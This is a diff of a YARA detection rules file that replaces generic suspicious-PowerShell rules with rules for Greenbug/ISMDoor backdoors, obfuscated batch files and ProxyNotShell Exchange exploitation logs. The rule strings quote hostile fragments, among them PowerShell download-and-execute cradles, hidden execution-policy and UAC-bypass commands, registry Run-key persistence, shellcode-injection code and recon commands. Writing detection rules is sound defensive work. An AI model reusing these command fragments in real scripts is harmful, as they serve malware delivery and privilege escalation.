+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L12-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e8053d8a95d41d81940bbaf7945323849613dbcfe727559a07bc294bd834b65f"
+		logic_hash = "e060a197dec0ce5da385abd282f0c4397bace8945b36198955925d02444b37a3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e3f69a1fb6fcaf9fd93386b6ba1d86731cd9e5648f7cff5242763188129cd158"
+		hash1 = "dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76"
 
 	strings:
-		$x1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\MRT.exe" fullword wide
-		$x2 = "tIphlpapi.dll" fullword wide
-		$x3 = "http://%s/provide?clients=%s&reqs=visit.startload" fullword wide
-		$x4 = "\\Gubed\\Release\\Gubed.pdb" ascii
-		$x5 = "d2hrpnfyb3wv3k.cloudfront.net" fullword wide
+		$s1 = "vailablez" fullword ascii
+		$s2 = "Sfouglr" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_Worddoc_Powershell_Urldownloadtofile : FILE
+rule SIGNATURE_BASE_Greenbug_Malware_2 : FILE
 {
 	meta:
-		description = "Detects Word Document with PowerShell URLDownloadToFile"
+		description = "Detects Backdoor from Greenbug Incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f76c5f91-f67c-5754-b771-73383aba4d64"
-		date = "2017-02-23"
-		modified = "2024-04-03"
-		reference = "https://www.arbornetworks.com/blog/asert/additional-insights-shamoon2/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L10-L30"
+		id = "e5d5ddae-cf6d-579f-9a67-9406838b5e0b"
+		date = "2017-01-25"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/urp4CD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L28-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4ea4e6092011bccfc5132186b910075361f4f77f01ae00c51c486d77a996775"
+		logic_hash = "25a9e1f08187f3d3cd0ec1384a5f4647c3368b99062f2e0d7d45c6c2ffeb66e0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "33ee8a57e142e752a9c8960c4f38b5d3ff82bf17ec060e4114f5b15d22aa902e"
-		hash2 = "388b26e22f75a723ce69ad820b61dd8b75e260d3c61d74ff21d2073c56ea565d"
-		hash3 = "71e584e7e1fb3cf2689f549192fe3a82fd4cd8ee7c42c15d736ebad47b028087"
+		hash1 = "6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d"
+		hash2 = "21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685"
+		hash3 = "319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6c"
 
 	strings:
-		$w1 = "Microsoft Forms 2.0 CommandButton" fullword ascii
-		$w2 = "Microsoft Word 97-2003 Document" fullword ascii
-		$p1 = "powershell.exe" fullword ascii
-		$p2 = "URLDownloadToFile" fullword ascii
+		$x1 = "|||Command executed successfully" fullword ascii
+		$x2 = "\\Release\\Bot Fresh.pdb" ascii
+		$x3 = "C:\\ddd\\a1.txt" fullword wide
+		$x4 = "Bots\\Bot5\\x64\\Release" ascii
+		$x5 = "Bot5\\Release\\Ism.pdb" ascii
+		$x6 = "Bot\\Release\\Ism.pdb" ascii
+		$x7 = "\\Bot Fresh\\Release\\Bot" ascii
+		$s1 = "/Home/SaveFile?commandId=CmdResult=" fullword wide
+		$s2 = "raB3G:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday" fullword ascii
+		$s3 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
+		$s4 = "SELECT * FROM AntiVirusProduct" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and 1 of ( $w* ) and all of ( $p* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Suspicious_Powershell_Code_1 : FILE
+rule SIGNATURE_BASE_Greenbug_Malware_3
 {
 	meta:
-		description = "Detects suspicious PowerShell code"
+		description = "Detects Backdoor from Greenbug Incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec3c3682-d2de-52b7-bb49-b021ddf7f8ac"
-		date = "2017-02-22"
-		modified = "2024-04-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L32-L50"
+		id = "68142bcd-4bd0-5c80-97fc-38811565e21c"
+		date = "2017-01-25"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/urp4CD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L56-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a254e0e4f0fdaa5907f5fe0b0c3d5226e2fdac4072349019abc2b2b11cbde30"
-		score = 60
-		quality = 58
-		tags = "FILE"
+		logic_hash = "f4e8672da2ed9d90d4ebfccca977c4aeb93656d9e467cf479699cefd03611f32"
+		score = 75
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
+		hash2 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
 
 	strings:
-		$s1 = /$[a-z]=new-object net.webclient/ ascii
-		$s2 = /$[a-z].DownloadFile\("http:/ ascii
-		$s3 = /IEX $[a-zA-Z]{1,8}.downloadstring\(["']http/ ascii nocase
-		$s4 = "powershell.exe -w hidden -ep bypass -Enc" ascii
-		$s5 = "-w hidden -noni -nop -c \"iex(New-Object" ascii
-		$s6 = "powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run" nocase
+		$x1 = "F:\\Projects\\Bot\\Bot\\Release\\Ism.pdb" fullword ascii
+		$x2 = "C:\\ddd\\wer2.txt" fullword wide
+		$x3 = "\\Microsoft\\Windows\\tmp43hh11.txt" wide
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Suspicious_Powershell_Webdownload_1 : HIGHVOL FILE
+rule SIGNATURE_BASE_Greenbug_Malware_4 : FILE
 {
 	meta:
-		description = "Detects suspicious PowerShell code that downloads from web sites"
+		description = "Detects ISMDoor Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a763fb82-c840-531b-b631-f282bf035020"
-		date = "2017-02-22"
-		modified = "2024-04-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L52-L91"
+		id = "d45dea36-6051-5531-afd2-abf27cd06a12"
+		date = "2017-01-25"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/urp4CD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L75-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "56ad9c71c34956e94325452d829627a30b1499552725232a07100f05a050ef1b"
-		score = 60
+		logic_hash = "869832536d838e062227ccd3b84f8559d2215360c0e09ec791db623d7d3d7a3b"
+		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		nodeepdive = 1
+		super_rule = 1
+		hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
+		hash2 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
 
 	strings:
-		$s1 = "System.Net.WebClient).DownloadString(\"http" ascii nocase
-		$s2 = "System.Net.WebClient).DownloadString('http" ascii nocase
-		$s3 = "system.net.webclient).downloadfile('http" ascii nocase
-		$s4 = "system.net.webclient).downloadfile(\"http" ascii nocase
-		$s5 = "GetString([Convert]::FromBase64String(" ascii nocase
-		$fp1 = "NuGet.exe" ascii fullword
-		$fp2 = "chocolatey.org" ascii
-		$fp3 = " GET /"
-		$fp4 = " POST /"
-		$fp5 = ".DownloadFile('https://aka.ms/installazurecliwindows', 'AzureCLI.msi')" ascii
-		$fp6 = " 404 "
-		$fp7 = "# RemoteSSHConfigurationScript" ascii
-		$fp8 = "<helpItems" ascii fullword
-		$fp9 = "DownloadFile(\"https://codecov.io/bash" ascii
-		$fp10 = "DownloadFile('https://get.golang.org/installer.exe" ascii
-		$fpg1 = "All Rights"
-		$fpg2 = "<html"
-		$fpg3 = "<HTML"
-		$fpg4 = "Copyright"
-		$fpg5 = "License"
-		$fpg6 = "<?xml"
-		$fpg7 = "Help" fullword
-		$fpg8 = "COPYRIGHT" fullword
+		$s1 = "powershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuser" fullword ascii
+		$s2 = "powershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"" fullword ascii
+		$s3 = "c:\\windows\\temp\\tmp8873" fullword ascii
+		$s4 = "taskkill /im winit.exe /f" fullword ascii
+		$s5 = "invoke-psuacme"
+		$s6 = "-method oobe -payload \"\"" fullword ascii
+		$s7 = "C:\\ProgramData\\stat2.dat" fullword wide
+		$s8 = "Invoke-bypassuac" fullword ascii
+		$s9 = "Start Keylog Done" fullword wide
+		$s10 = "Microsoft\\Windows\\WinIt.exe" fullword ascii
+		$s11 = "Microsoft\\Windows\\Tmp9932u1.bat\"" fullword ascii
+		$s12 = "Microsoft\\Windows\\tmp43hh11.txt" fullword wide
 
 	condition:
-		1 of ( $s* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Powershell_In_Word_Doc : FILE
+rule SIGNATURE_BASE_Greenbug_Malware_5 : FILE
 {
 	meta:
-		description = "Detects a powershell and bypass keyword in a Word document"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c9d073ff-25c6-5751-92bf-e22ae7cfd5f5"
-		date = "2017-06-27"
-		modified = "2024-04-03"
-		reference = "Internal Research - ME"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L104-L119"
+		id = "12362711-f466-5f9e-9227-1cf84aec93e5"
+		date = "2017-01-25"
+		modified = "2023-01-27"
+		reference = "https://goo.gl/urp4CD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L103-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6a9b295f1c430c285aedc5e6df268ea2023c8bdaccd04cf8a5d021419cd6bd64"
-		score = 50
-		quality = 83
+		logic_hash = "cdb4b2447e7eb3546b33a804abf5fbc20817823e5c9440109db7b44adf90899d"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905"
+		super_rule = 1
+		hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
+		hash2 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
+		hash3 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
+		hash4 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
 
 	strings:
-		$s1 = "POwErSHELl.ExE" fullword ascii nocase
-		$s2 = "BYPASS" fullword ascii nocase
+		$x1 = "cmd /u /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter" fullword ascii
+		$x2 = "cmd /a /c net user administrator /domain >>" fullword ascii
+		$x3 = "cmd /a /c netstat -ant >>\"%localappdata%\\Microsoft\\" ascii
+		$o1 = "========================== (Net User) ==========================" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 1000KB and all of them )
+		filesize < 2000KB and ( ( uint16( 0 ) == 0x5a4d and 1 of them ) or $o1 )
 }
-rule SIGNATURE_BASE_Susp_Powershell_Sep17_1 : FILE
+
+rule SIGNATURE_BASE_Greenbug_Malware_Nov17_1 : FILE
 {
 	meta:
-		description = "Detects suspicious PowerShell script in combo with VBS or JS "
+		description = "Detects Greenbug Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d4b9113-173f-5c12-b440-7f1cef9e6ebb"
-		date = "2017-09-30"
-		modified = "2024-04-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L131-L148"
+		id = "50816c09-5f38-5e05-9915-b96f00ee4b88"
+		date = "2017-11-26"
+		modified = "2023-12-05"
+		reference = "http://www.clearskysec.com/greenbug/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greenbug.yar#L141-L169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6c8a1e72b2c4685a5a5749d86901b123976092aee373412bf04c62aa32145be8"
-		score = 60
-		quality = 85
+		logic_hash = "afd006d7e53cdedbed5938e5dea71273dd21a1382239bac03194662e95d053c8"
+		score = 75
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8e28521749165d2d48bfa1eac685c985ac15fc9ca5df177d4efadf9089395c56"
+		hash1 = "6e55e161dc9ace3076640a36ef4a8819bb85c6d5e88d8e852088478f79cf3b7c"
+		hash2 = "a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821"
 
 	strings:
-		$x1 = "Process.Create(\"powershell.exe -nop -w hidden" fullword ascii nocase
-		$x2 = ".Run\"powershell.exe -nop -w hidden -c \"\"IEX " ascii
-		$s1 = "window.resizeTo 0,0" fullword ascii
+		$x1 = "AgentV2.exe  -c  SampleDomain.com" fullword ascii
+		$x2 = ".ntpupdateserver.com" fullword ascii
+		$x3 = "Content-Disposition: form-data; name=\"file\"; filename=\"a.a\"" fullword ascii
+		$x4 = "a67d0db885a3432576548a2a03707334" fullword ascii
+		$x5 = "a67d0db8a2a173347654432503702aa3" fullword ascii
+		$x6 = "!!! can not create output file !!!" fullword ascii
+		$s1 = "\\runlog*" ascii
+		$s2 = "can not specify username!!" fullword ascii
+		$s3 = "Agent can not be configured" fullword ascii
 
 	condition:
-		( filesize < 2KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "58ba44f7ff5436a603fec3df97d815ea" or pe.imphash ( ) == "538805ecd776b9a42e71aebf94fde1b1" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Susp_Powershell_Sep17_2 : FILE
+rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_1 : FILE
 {
 	meta:
-		description = "Detects suspicious PowerShell script in combo with VBS or JS "
-		author = "Florian Roth (Nextron Systems)"
-		id = "e44d1dfc-0858-5248-a57f-efb5c647f4cc"
-		date = "2017-09-30"
-		modified = "2024-04-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L150-L170"
+		description = "Detects indicators of obfuscation in Windows Batch files"
+		author = "Florian Roth"
+		id = "801e7efc-2c31-5590-afcd-9e11072c9c65"
+		date = "2024-07-12"
+		modified = "2024-12-12"
+		reference = "https://x.com/0xToxin/status/1811656147943752045"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/susp_bat_obfusc_jul24.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0819f57afb6d1d878e4db4079bfd43ccac520829c877de04d16d8bd048a35ab5"
-		score = 65
+		logic_hash = "683f4651eb8c5b74eca16e7f97c5c44f0d70f045ea49f1f3726cb6975aba2ab9"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e387f6c7a55b85e0675e3b91e41e5814f5d0ae740b92f26ddabda6d4f69a8ca8"
 
 	strings:
-		$x1 = ".Run \"powershell.exe -nop -w hidden -e " ascii
-		$x2 = "FileExists(path + \"\\..\\powershell.exe\")" fullword ascii
-		$x3 = "window.moveTo -4000, -4000" fullword ascii
-		$s1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
+		$s1 = "&&set "
 
 	condition:
-		filesize < 20KB and ( ( uint16( 0 ) == 0x733c and 1 of ( $x* ) ) or 2 of them )
+		filesize < 300KB and uint32( 0 ) == 0x20746573 and $s1 in ( 0 .. 32 )
 }
-rule SIGNATURE_BASE_Wscript_Shell_Powershell_Combo : FILE
+rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_2 : FILE
 {
 	meta:
-		description = "Detects malware from Middle Eastern campaign reported by Talos"
-		author = "Florian Roth (Nextron Systems)"
-		id = "265ec471-d9ed-5cb6-a32b-cfa62fccdf64"
-		date = "2018-02-07"
-		modified = "2024-04-03"
-		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L172-L193"
+		description = "Detects indicators of obfuscation in Windows Batch files"
+		author = "Florian Roth"
+		id = "999cd365-2862-5618-b0b6-ee45dea1e9cf"
+		date = "2024-07-12"
+		modified = "2024-12-12"
+		reference = "https://x.com/0xToxin/status/1811656147943752045"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/susp_bat_obfusc_jul24.yar#L18-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0ab5808593c999c1ce342051a8e292153aa20516cf48071565d677399adfb160"
-		score = 50
+		logic_hash = "729ec93d180bf39c146c3fd847655340428abc3231b556ca51d3ca68825e7c3e"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b"
 
 	strings:
-		$s1 = ".CreateObject(\"WScript.Shell\")" ascii
-		$p1 = "powershell.exe" fullword ascii
-		$p2 = "-ExecutionPolicy Bypass" fullword ascii
-		$p3 = "[System.Convert]::FromBase64String(" ascii
-		$fp1 = "Copyright: Microsoft Corp." ascii
+		$s1 = "&&set "
 
 	condition:
-		filesize < 400KB and $s1 and 1 of ( $p* ) and not 1 of ( $fp* )
+		filesize < 300KB and #s1 > 30 and uint16( filesize -2 ) == 0x0a0d and uint8( filesize -3 ) == 0x25
 }
-rule SIGNATURE_BASE_SUSP_Powershell_String_K32_Remprocess : FILE
+rule SIGNATURE_BASE_SUSP_BAT_OBFUSC_Jul24_3 : FILE
 {
 	meta:
-		description = "Detects suspicious PowerShell code that uses Kernel32, RemoteProccess handles or shellcode"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ad646e19-b132-5594-bea2-d74e96c06ebb"
-		date = "2018-03-31"
-		modified = "2024-04-03"
-		reference = "https://github.com/nccgroup/redsnarf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L195-L215"
+		description = "Detects indicators of obfuscation in Windows Batch files"
+		author = "Florian Roth"
+		id = "a484ed03-8588-55e7-9674-b1208e14eb3f"
+		date = "2024-07-12"
+		modified = "2024-12-12"
+		reference = "https://x.com/0xToxin/status/1811656147943752045"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/susp_bat_obfusc_jul24.yar#L37-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "03c80de8e59e640709c4ee1912dc47c398e265f9b88845a6de88031e2eb46ba3"
-		score = 65
+		logic_hash = "ecbe7850349f0368620ff4294e5d0ca277983799eed510f8bf8abe4d4c192197"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash3 = "54a8dd78ec4798cf034c7765d8b2adfada59ac34d019e77af36dcaed1db18912"
-		hash4 = "6d52cdd74edea68d55c596554f47eefee1efc213c5820d86e64de0853a4e46b3"
 
 	strings:
-		$x1 = "Throw \"Unable to allocate memory in the remote process for shellcode\"" fullword ascii
-		$x2 = "$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")" fullword ascii
-		$s3 = "$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants." ascii
-		$s7 = "if ($RemoteProcHandle -eq [IntPtr]::Zero)" fullword ascii
-		$s8 = "if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))" fullword ascii
-		$s9 = "$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, " ascii
-		$s15 = "$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null" fullword ascii
+		$s1 = "% \\\\%"
+		$s2 = { 3D ?? 26 26 73 65 74 20 }
 
 	condition:
-		uint16( 0 ) == 0x7566 and filesize < 6000KB and 1 of them
+		filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Powershell_JAB_B64 : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_1 : CVE_2022_41040 CVE_2022_41082
 {
 	meta:
-		description = "Detects base464 encoded $ sign at the beginning of a string"
+		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c18fa17b-aaa5-5a89-bc25-3cc51b5af103"
-		date = "2018-04-02"
-		modified = "2024-04-03"
-		reference = "https://twitter.com/ItsReallyNick/status/980915287922040832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L217-L231"
+		id = "a61f6582-474f-5b6f-b8f5-329c0bcc4017"
+		date = "2022-12-22"
+		modified = "2023-12-05"
+		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxynotshell_owassrf_dec22.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4746a73774f945e63455ca7dd58ef67290f7c66d2dca80d06d52d2545c69a190"
-		score = 60
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "1e8f5a3440f8b4b1850fddbd19f63796ad0f28178c678e9f464b7e4ab5ca944f"
+		score = 70
+		quality = 85
+		tags = "CVE-2022-41040, CVE-2022-41082"
 
 	strings:
-		$s1 = "('JAB" ascii wide
-		$s2 = "powershell" nocase
+		$s1 = "/owa/mastermailbox%40outlook.com/powershell" ascii wide
+		$sa1 = " 200 " ascii wide
+		$sa2 = " POST " ascii wide
+		$fp1 = "ClientInfo" ascii wide fullword
+		$fp2 = "Microsoft WinRM Client" ascii wide fullword
+		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
 
 	condition:
-		filesize < 30KB and all of them
+		all of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_SUSP_PS1_Frombase64String_Content_Indicator : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Proxynotshell_OWASSRF_Powershell_Proxy_Log_Dec22_2 : CVE_2022_41040 CVE_2022_41082
 {
 	meta:
-		description = "Detects suspicious base64 encoded PowerShell expressions"
+		description = "Detects traces of exploitation activity in relation to ProxyNotShell MS Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082"
 		author = "Florian Roth (Nextron Systems)"
-		id = "326c83ff-5d21-508f-b935-03ccdab6efa7"
-		date = "2020-01-25"
-		modified = "2024-04-03"
-		reference = "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L233-L284"
+		id = "85722997-fd28-51cf-817e-7a314e284b0b"
+		date = "2022-12-22"
+		modified = "2023-12-05"
+		reference = "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxynotshell_owassrf_dec22.yar#L24-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a9ec7a00e9faee5cc081a2bc86abf8027fcd3cfe590cdd4f2f99425b6723f23f"
-		score = 65
-		quality = 83
-		tags = "FILE"
+		logic_hash = "73ce86b7a673719c916666fa06963b774edad5b2cd804994614afd83ea75ecef"
+		score = 60
+		quality = 60
+		tags = "CVE-2022-41040, CVE-2022-41082"
 
 	strings:
-		$ = "::FromBase64String(\"H4s" ascii wide
-		$ = "::FromBase64String(\"TVq" ascii wide
-		$ = "::FromBase64String(\"UEs" ascii wide
-		$ = "::FromBase64String(\"JAB" ascii wide
-		$ = "::FromBase64String(\"SUVY" ascii wide
-		$ = "::FromBase64String(\"SQBFAF" ascii wide
-		$ = "::FromBase64String(\"SQBuAH" ascii wide
-		$ = "::FromBase64String(\"PAA" ascii wide
-		$ = "::FromBase64String(\"cwBhA" ascii wide
-		$ = "::FromBase64String(\"aWV4" ascii wide
-		$ = "::FromBase64String(\"aQBlA" ascii wide
-		$ = "::FromBase64String(\"R2V0" ascii wide
-		$ = "::FromBase64String(\"dmFy" ascii wide
-		$ = "::FromBase64String(\"dgBhA" ascii wide
-		$ = "::FromBase64String(\"dXNpbm" ascii wide
-		$ = "::FromBase64String(\"H4sIA" ascii wide
-		$ = "::FromBase64String(\"Y21k" ascii wide
-		$ = "::FromBase64String(\"Qzpc" ascii wide
-		$ = "::FromBase64String(\"Yzpc" ascii wide
-		$ = "::FromBase64String(\"IAB" ascii wide
-		$ = "::FromBase64String('H4s" ascii wide
-		$ = "::FromBase64String('TVq" ascii wide
-		$ = "::FromBase64String('UEs" ascii wide
-		$ = "::FromBase64String('JAB" ascii wide
-		$ = "::FromBase64String('SUVY" ascii wide
-		$ = "::FromBase64String('SQBFAF" ascii wide
-		$ = "::FromBase64String('SQBuAH" ascii wide
-		$ = "::FromBase64String('PAA" ascii wide
-		$ = "::FromBase64String('cwBhA" ascii wide
-		$ = "::FromBase64String('aWV4" ascii wide
-		$ = "::FromBase64String('aQBlA" ascii wide
-		$ = "::FromBase64String('R2V0" ascii wide
-		$ = "::FromBase64String('dmFy" ascii wide
-		$ = "::FromBase64String('dgBhA" ascii wide
-		$ = "::FromBase64String('dXNpbm" ascii wide
-		$ = "::FromBase64String('H4sIA" ascii wide
-		$ = "::FromBase64String('Y21k" ascii wide
-		$ = "::FromBase64String('Qzpc" ascii wide
-		$ = "::FromBase64String('Yzpc" ascii wide
-		$ = "::FromBase64String('IAB" ascii wide
+		$sr1 = / \/owa\/[^\/\s]{1,30}(%40|@)[^\/\s\.]{1,30}\.[^\/\s]{2,3}\/powershell / ascii wide
+		$sa1 = " 200 " ascii wide
+		$sa2 = " POST " ascii wide
+		$fp1 = "ClientInfo" ascii wide fullword
+		$fp2 = "Microsoft WinRM Client" ascii wide fullword
+		$fp3 = "Exchange BackEnd Probes" ascii wide fullword
 
 	condition:
-		filesize < 5000KB and 1 of them
+		all of ( $s* ) and not 1 of ( $fp* )
 }
